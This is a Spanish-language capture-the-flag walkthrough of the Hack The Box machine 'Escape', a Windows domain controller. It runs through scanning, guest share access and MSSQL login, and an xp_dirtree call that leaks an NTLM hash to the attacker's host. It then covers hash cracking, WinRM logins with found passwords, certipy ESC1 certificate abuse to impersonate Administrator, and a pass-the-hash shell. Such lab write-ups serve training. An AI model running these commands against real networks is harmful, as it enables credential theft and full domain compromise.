Escape

---

---

Escaneo:

# Nmap 7.95 scan initiated Mon Jul 14 22:17:28 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p135,139,1433,3268,3269,389,445,464,49667,49689,49690,49709,49725,49744,593,5985,636,88,9389,53 -oN targeted 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.39s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-15 04:17:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-07-15T04:19:15+00:00; +8h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-07-15T04:19:13+00:00; +8h00m00s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.202:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-07-15T04:19:12+00:00; +7h59m59s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.202:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-07-15T03:49:12
|_Not valid after:  2055-07-15T03:49:12
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-15T04:19:12+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2025-07-15T04:19:12+00:00; +8h00m00s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49709/tcp open  msrpc         Microsoft Windows RPC
49725/tcp open  msrpc         Microsoft Windows RPC
49744/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-07-15T04:18:32
|_  start_date: N/A
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 14 22:19:17 2025 -- 1 IP address (1 host up) scanned in 108.93 seconds

---

Descargamos con el script si hay algo en los recursos compartidos:

smb_445.py 10.10.11.202 -u guest -p ""

Abrimos el .pdf:

Tenemos un usuario y una contraseña:

PublicUser:GuestUserCantWrite1

---

Entramos a la base de datos que se encuentra en el puerto 1433:

1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.202:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

Usaremos impacket:

impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.10.11.202

🧠 ¿Qué hace xp_dirtree?

xp_dirtree es una stored procedure extendida que lista directorios desde una ruta especificada. Al pasarle una ruta UNC (\\IP\share), el servidor SQL intenta acceder a un recurso de red, lo que provoca que el servidor SQL se autentique contra ese recurso.

EXEC xp_dirtree '\\10.10.16.10\test'

🪝 ¿Qué lograste?

Lograste que el servidor SQL Server (10.10.11.202) se autenticara automáticamente contra tu máquina (10.10.16.10), que probablemente estaba ejecutando Responder, SMBServer o impacket-smbserver, lo cual captura el hash NTLMv2 del usuario de servicio que corre SQL Server.

Crackear el hash (recomendado si tienes tiempo):

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

REGGIE1234ronnie (sql_svc) 

---

Entramos como el usuario sql_svc

evil-winrm -i 10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie'

---

Recordemos que tenemos una Base de datos abierto y podemos entrar a ese directorio a ver que contiene:

---

Encontramos en los logs un usuario y una contraseña posible:

sequel.htb\Ryan.Cooper : NuclearMosquito3

---

Entramos por evil-winrm al usuario Ryan.Cooper

evil-winrm -i 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3'

---

Certficados de active Directory (ADCS)

Un vector que deberemos analizar en un entorno de AD cuando tenemos acceso al objetivo y queremos elevar privilegios, es buscar Servicios de Certficados de active Directory (ADCS). Para enumerar esto, vamos a utilizar netexec.

 nxc ldap 10.10.11.202 -u ryan.cooper -p NuclearMosquito3 -M adcs

---

 certipy-ad -debug find -target 10.10.11.202 -u ryan.cooper@sequel.htb -p 'NuclearMosquito3' -vulnerable

Ese output que muestras indica claramente que la plantilla UserAuthentication es vulnerable a ESC1 (Client Authentication + EnrolleeSuppliesSubject) y que los Domain Users tienen permiso de inscripción.

Usa certipy-ad req para hacer la petición suplantando a Administrator:

certipy-ad req -u ryan.cooper@sequel.htb -p 'NuclearMosquito3' -template 'UserAuthentication' \
-ca 'sequel-DC-CA' -dc-ip 10.10.11.202 -upn Administrator@sequel.htb

Te generará un archivo .pfx (como administrator.pfx).

---

Autenticarte en el controlador de dominio (10.10.11.202) como Administrator usando un certificado .pfx generado previamente.

 certipy-ad auth -pfx administrator.pfx -domain sequel.htb -dc-ip 10.10.11.202

🧠 ¿Qué logró ese comando?

• Enviaste el certificado .pfx como medio de autenticación.

• El DC verificó la validez del certificado (porque fue emitido por una CA interna).

• Obtuviste un TGT (Ticket Granting Ticket) de Kerberos como Administrator.

• Certipy automáticamente extrajo el NT hash de Administrator.

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

---

Se conseguido una shell remota en la máquina como Administrator, utilizando Pass-the-Hash a través de Evil-WinRM.

evil-winrm -i 10.10.11.202 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee

---